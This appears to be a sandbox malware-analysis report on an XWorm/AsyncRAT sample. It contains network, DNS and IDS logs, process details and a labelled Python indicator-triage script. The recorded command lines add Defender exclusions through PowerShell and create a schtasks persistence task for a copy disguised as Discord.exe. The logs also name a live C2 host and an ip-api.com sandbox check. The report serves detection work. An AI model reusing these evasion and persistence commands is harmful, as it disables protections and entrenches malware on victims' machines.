                                     Oct 13, 2024 18:53:53.669591904 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:53.980479002 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:53.982449055 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:53.987377882 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:57.883028030 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:57.888012886 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:58.194732904 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:53:58.197295904 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:53:58.202299118 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:00.039427042 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:54:00.044399977 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:00.195662022 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:54:00.200671911 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:00.345370054 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:00.347723961 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:54:00.352586031 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:00.560206890 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:00.563723087 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:54:00.568542957 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:00.917521954 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:54:00.922672033 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:01.284863949 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:01.289530993 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:54:01.294441938 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:03.650095940 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:03.796745062 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:54:10.039300919 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:54:10.046318054 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:10.359905958 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Oct 13, 2024 18:54:10.360654116 CEST | 49739 | 20557 | 192.168.2.4 | 147.185.221.23
                                     Oct 13, 2024 18:54:10.365539074 CEST | 20557 | 49739 | 147.185.221.23 | 192.168.2.4
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Oct 13, 2024 18:52:01.301738024 CEST | 61328 | 53 | 192.168.2.4 | 1.1.1.1
                                     Oct 13, 2024 18:52:01.310137987 CEST | 53 | 61328 | 1.1.1.1 | 192.168.2.4
                                     Oct 13, 2024 18:52:53.873722076 CEST | 50576 | 53 | 192.168.2.4 | 1.1.1.1
                                     Oct 13, 2024 18:52:53.888708115 CEST | 53 | 50576 | 1.1.1.1 | 192.168.2.4
                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                     Oct 13, 2024 18:52:01.301738024 CEST | 192.168.2.4 | 1.1.1.1 | 0x2b47 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                     Oct 13, 2024 18:52:53.873722076 CEST | 192.168.2.4 | 1.1.1.1 | 0x1c83 | Standard query (0) | methods-availability.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                     Oct 13, 2024 18:52:01.310137987 CEST | 1.1.1.1 | 192.168.2.4 | 0x2b47 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                     Oct 13, 2024 18:52:53.888708115 CEST | 1.1.1.1 | 192.168.2.4 | 0x1c83 | No error (0) | methods-availability.gl.at.ply.gg | | 147.185.221.23 | A (IP address) | IN (0x0001) | false
                                    • ip-api.com
                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     0 | 192.168.2.4 | 49730 | 208.95.112.1 | 80 | 7352 | C:\Users\user\Desktop\s3OBQLA3xR.exe
                                     Timestamp | Bytes transferred | Direction | Data
                                     Oct 13, 2024 18:52:01.321923971 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                     Host: ip-api.com
                                     Connection: Keep-Alive
                                     Oct 13, 2024 18:52:01.818238974 CEST | 175 | IN | HTTP/1.1 200 OK
                                     Date: Sun, 13 Oct 2024 16:52:01 GMT
                                     Content-Type: text/plain; charset=utf-8
                                     Content-Length: 6
                                     Access-Control-Allow-Origin: *
                                     X-Ttl: 60
                                     X-Rl: 44
                                     Data Raw: 66 61 6c 73 65 0a
                                     Data Ascii: false
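The DNS, TCP, IDS-alert and HTTP tables above are the raw material a responder turns into indicators. The Python below is an added example and not part of the Joe Sandbox report: its constants are subsets transcribed from the tables above (not captured live), and every function and field name is this example's own. It ties the C2 address back to the name the sample resolved just before connecting, lists the outbound sessions with their resolved names, summarises the alerts per SID with the median spacing between repeats (the inbound PING SID fires at a steady interval, which is the server-side keepalive period), and flags the ip-api.com request whose `hosting` field tells the caller whether its public address sits in hosting or data-center address space; the response here was `false`.

```python
"""Network triage of the report above: resolve the C2 address back to the name the
sample looked up, list outbound sessions, summarise IDS alerts per SID and flag the
ip-api.com data-center check. Added example; constants are transcribed subsets."""
from collections import defaultdict
from datetime import datetime
from statistics import median

SANDBOX_IP = "192.168.2.4"

# DNS answers: (timestamp, name, address), transcribed from the DNS answer table.
DNS_ANSWERS = [
    ("18:52:01.310137", "ip-api.com", "208.95.112.1"),
    ("18:52:53.888708", "methods-availability.gl.at.ply.gg", "147.185.221.23"),
]

# TCP packets: (timestamp, src_port, dst_port, src_ip, dst_ip), a subset of the
# packet table with timestamps truncated to microseconds.
TCP_PACKETS = [
    ("18:52:01.316148", 49730, 80, "192.168.2.4", "208.95.112.1"),
    ("18:52:01.321202", 80, 49730, "208.95.112.1", "192.168.2.4"),
    ("18:52:01.321923", 49730, 80, "192.168.2.4", "208.95.112.1"),
    ("18:52:53.893053", 49739, 20557, "192.168.2.4", "147.185.221.23"),
    ("18:52:53.899662", 20557, 49739, "147.185.221.23", "192.168.2.4"),
    ("18:52:53.945575", 49739, 20557, "192.168.2.4", "147.185.221.23"),
    ("18:53:05.918101", 49739, 20557, "192.168.2.4", "147.185.221.23"),
]

# Suricata alerts: (timestamp, sid, signature, src_ip, dst_ip), a subset of the alert table.
ALERTS = [
    ("18:53:03.649760", 2852874, "ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2", "147.185.221.23", "192.168.2.4"),
    ("18:53:06.231787", 2852923, "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)", "192.168.2.4", "147.185.221.23"),
    ("18:53:17.851676", 2855924, "ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound", "192.168.2.4", "147.185.221.23"),
    ("18:53:18.172927", 2852923, "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)", "192.168.2.4", "147.185.221.23"),
    ("18:53:33.655222", 2852874, "ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2", "147.185.221.23", "192.168.2.4"),
    ("18:54:03.650096", 2852874, "ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2", "147.185.221.23", "192.168.2.4"),
]

# HTTP requests: (timestamp, host, method, path, response_body), from the HTTP section.
HTTP_REQUESTS = [("18:52:01.321923", "ip-api.com", "GET", "/line/?fields=hosting", "false\n")]


def _ts(value):
    return datetime.strptime(value, "%H:%M:%S.%f")


def outbound_sessions(packets, dns_answers):
    """One entry per (dst_ip, dst_port) the sandbox host connected to, with the name
    it had resolved for that address and the number of outbound packets."""
    names = {ip: name for _, name, ip in dns_answers}
    sessions = {}
    for ts, _sport, dport, src, dst in packets:
        if src != SANDBOX_IP:
            continue
        entry = sessions.setdefault((dst, dport), {
            "dst": dst, "port": dport, "name": names.get(dst), "first_seen": ts, "packets": 0})
        entry["packets"] += 1
    return sorted(sessions.values(), key=lambda s: s["first_seen"])


def alert_summary(alerts):
    """Per SID: signature, direction relative to the sandbox host, hit count and the
    median gap between consecutive hits (None when the SID fired only once)."""
    by_sid = defaultdict(list)
    for ts, sid, sig, _src, dst in alerts:
        by_sid[sid].append((_ts(ts), sig, "inbound" if dst == SANDBOX_IP else "outbound"))
    summary = {}
    for sid, rows in by_sid.items():
        rows.sort(key=lambda r: r[0])
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(rows, rows[1:])]
        summary[sid] = {"signature": rows[0][1], "direction": rows[0][2], "count": len(rows),
                        "median_gap_s": round(median(gaps), 1) if gaps else None}
    return summary


def datacenter_checks(requests):
    """Flag ip-api.com lookups of the 'hosting' field: the answer tells the caller
    whether its public address belongs to a hosting/data-center range."""
    return [{"ts": ts, "request": f"{method} {path}", "hosting": body.strip()}
            for ts, host, method, path, body in requests
            if host == "ip-api.com" and "hosting" in path]


def indicators():
    """Bundle the C2 endpoints (sessions that IDS alerts fired on), alert summary
    and evasion checks a responder would carry into a hunt."""
    alerted = ({a[3] for a in ALERTS} | {a[4] for a in ALERTS}) - {SANDBOX_IP}
    sessions = outbound_sessions(TCP_PACKETS, DNS_ANSWERS)
    return {"c2": [(s["name"], s["dst"], s["port"]) for s in sessions if s["dst"] in alerted],
            "alerts": alert_summary(ALERTS),
            "evasion_checks": datacenter_checks(HTTP_REQUESTS)}


if __name__ == "__main__":
    import json
    print(json.dumps(indicators(), indent=2))
```

Run stand-alone it prints the indicator bundle; the gap computation is what separates a keepalive (steady spacing on the inbound PING SID) from the irregular outbound check-ins, and is the number to feed a beaconing threshold.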


                                    Target ID:0
                                    Start time:12:51:57
                                    Start date:13/10/2024
                                    Path:C:\Users\user\Desktop\s3OBQLA3xR.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\s3OBQLA3xR.exe"
                                    Imagebase:0x860000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:false

                                    Target ID:1
                                    Start time:12:52:01
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:12:52:01
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:12:52:08
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe'
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:12:52:08
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:12:52:17
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe'
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:12:52:17
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:12:52:32
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:12:52:32
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:13
                                    Start time:12:52:52
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:14
                                    Start time:12:52:52
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:15
                                    Start time:12:52:54
                                    Start date:13/10/2024
                                    Path:C:\Users\user\AppData\Roaming\Discord.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\AppData\Roaming\Discord.exe
                                    Imagebase:0x1b0000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 76%, ReversingLabs
                                    • Detection: 65%, Virustotal
                                    Reputation:low
                                    Has exited:true

                                    Target ID:16
                                    Start time:12:53:01
                                    Start date:13/10/2024
                                    Path:C:\Users\user\AppData\Roaming\Discord.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\AppData\Roaming\Discord.exe
                                    Imagebase:0x380000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:17
                                    Start time:12:53:05
                                    Start date:13/10/2024
                                    Path:C:\Users\user\AppData\Roaming\Discord.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\Discord.exe"
                                    Imagebase:0xa20000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:18
                                    Start time:12:53:13
                                    Start date:13/10/2024
                                    Path:C:\Users\user\AppData\Roaming\Discord.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\Discord.exe"
                                    Imagebase:0x4c0000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:20
                                    Start time:12:54:00
                                    Start date:13/10/2024
                                    Path:C:\Users\user\AppData\Roaming\Discord.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\AppData\Roaming\Discord.exe
                                    Imagebase:0x4b0000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                      Execution Graph

                                      Execution Coverage:18.9%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:13.6%
                                      Total number of Nodes:22
                                      Total number of Limit Nodes:1
                                      execution_graph 6664 7ffd9b7e764a 6665 7ffd9b7e7a70 CheckRemoteDebuggerPresent 6664->6665 6667 7ffd9b7e7b0f 6665->6667 6651 7ffd9b7e9d98 6652 7ffd9b7e9da1 SetWindowsHookExW 6651->6652 6654 7ffd9b7e9e71 6652->6654 6659 7ffd9b7e9808 6660 7ffd9b7e980d 6659->6660 6661 7ffd9b7e98d2 RtlSetProcessIsCritical 6660->6661 6663 7ffd9b7e97c5 6660->6663 6662 7ffd9b7e9932 6661->6662 6655 7ffd9b7e7a51 6656 7ffd9b7e7a9e CheckRemoteDebuggerPresent 6655->6656 6658 7ffd9b7e7b0f 6656->6658 6642 7ffd9b7eafb1 6643 7ffd9b7eafec 6642->6643 6644 7ffd9b7eb03e 6643->6644 6646 7ffd9b7e97f8 6643->6646 6647 7ffd9b7e9801 6646->6647 6648 7ffd9b7e98d2 RtlSetProcessIsCritical 6647->6648 6650 7ffd9b7e97c5 6647->6650 6649 7ffd9b7e9932 6648->6649 6649->6643 6650->6643

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: aaaeb9ac4293da44a46736d751da98c81d4c8ebcaa3f11aeb235d52f74a52179
                                      • Instruction ID: 9a29b5f470907eba9937a3757c3dc23a25126f16fd521b8f9442fa5097f3b5f5
                                      • Opcode Fuzzy Hash: aaaeb9ac4293da44a46736d751da98c81d4c8ebcaa3f11aeb235d52f74a52179
                                      • Instruction Fuzzy Hash: D2727530F1D61D4FEBA4EB7884666BD72D2EF99340B514A79D01EC32F6DE38A9428740

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CAN_^
                                      • API String ID: 0-3098826533
                                      • Opcode ID: e544efe4793427840794a36d88b2d7e37a89fb6c075f3a07c6f9a7c77711d23d
                                      • Instruction ID: d3ad8f9663a51c9c9275abdda03bc9e03c73c9cf2ef6ddfffe4d5e8f910a7538
                                      • Opcode Fuzzy Hash: e544efe4793427840794a36d88b2d7e37a89fb6c075f3a07c6f9a7c77711d23d
                                      • Instruction Fuzzy Hash: F622A570B19A4D4FE798EB78847ABBD76E1FF98304F410579E01EC32E6DE28A9418741

                                      Control-flow Graph

                                      control_flow_graph 660 7ffd9b7e764a-7ffd9b7e7b0d CheckRemoteDebuggerPresent 664 7ffd9b7e7b15-7ffd9b7e7b58 660->664 665 7ffd9b7e7b0f 660->665 665->664
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID: CheckDebuggerPresentRemote
                                      • String ID:
                                      • API String ID: 3662101638-0
                                      • Opcode ID: 68704141989427dcaff103a6deda7716c549cb8be79d1a7b2f62b2f544091dd5
                                      • Instruction ID: 9603296c13848064e410d6773d4341e3c1d4e04f2f795af85af8d9185963efce
                                      • Opcode Fuzzy Hash: 68704141989427dcaff103a6deda7716c549cb8be79d1a7b2f62b2f544091dd5
                                      • Instruction Fuzzy Hash: 0D31063190861C8FCB58DF5CC84A7FD7BE0EF65311F05426ED48AD7251CB70A8428B91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: abae41437c3ad334f98160c132f66bb7c51eb3be128fd4d8d04dbe202608c6fa
                                      • Instruction ID: 24893840ddfb45d9d5848b1e372616c6261f28f3216ab1ea6d739f179a9de525
                                      • Opcode Fuzzy Hash: abae41437c3ad334f98160c132f66bb7c51eb3be128fd4d8d04dbe202608c6fa
                                      • Instruction Fuzzy Hash: 3FF1A330A09A8D8FEBA8DF28C855BE977D1FF54310F04426EE85DC72A5DB34E9458B81
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b162f774c4ef38e129ed0c67ade6c61ca4da350d4952be7263bce15b3069187c
                                      • Instruction ID: 3d8568f51d3111df6bdf8276952aefb4232fe7ba48bac6f031364551dcc64fad
                                      • Opcode Fuzzy Hash: b162f774c4ef38e129ed0c67ade6c61ca4da350d4952be7263bce15b3069187c
                                      • Instruction Fuzzy Hash: C7E1C530A09A8E4FEBA8DF28D8557E977D1FF54310F14436EE84DC72A5DE74A9408B81
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 37b7720bd009612fa018e6f1f56f7a5cab94478920eabdd2ce3b8cc94164a4ef
                                      • Instruction ID: 814898a5a9aeea050588855525127d8ae96c76a508d6dea024158c00db20886c
                                      • Opcode Fuzzy Hash: 37b7720bd009612fa018e6f1f56f7a5cab94478920eabdd2ce3b8cc94164a4ef
                                      • Instruction Fuzzy Hash: F7C1D670B1DA0D4FEB98EBA884766BD77D2EF99304F454279E04EC32F6DE28A9014741
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b30415c6ac9088d1e47c80a5ca8d2a3f45a586f81ef6ba25fd928a8a3d342ffd
                                      • Instruction ID: 3d4f21c0cbfd235bc638165544985834441ceb0751146bb4357134305963d78a
                                      • Opcode Fuzzy Hash: b30415c6ac9088d1e47c80a5ca8d2a3f45a586f81ef6ba25fd928a8a3d342ffd
                                      • Instruction Fuzzy Hash: 4D512E10B1E6C94FD79AABB848746A67FE4DF87229B0801FBE09DC71E7DD181806C342

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
                                      • Opcode ID: 6b13e4e9c8a49bc2d67142a32ec3c31d7461692b025b2c3204ddf86b4dd00eb4
                                      • Instruction ID: 0e91b14811eb892e00c916a0592c8c78b11176b77f8bba9d1868a24c9dc5b953
                                      • Opcode Fuzzy Hash: 6b13e4e9c8a49bc2d67142a32ec3c31d7461692b025b2c3204ddf86b4dd00eb4
                                      • Instruction Fuzzy Hash: EBC1F530A0C64C8FDB59DB68D859AEDBBF0FF55310F1441BED099D72A6CA34A846CB81

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
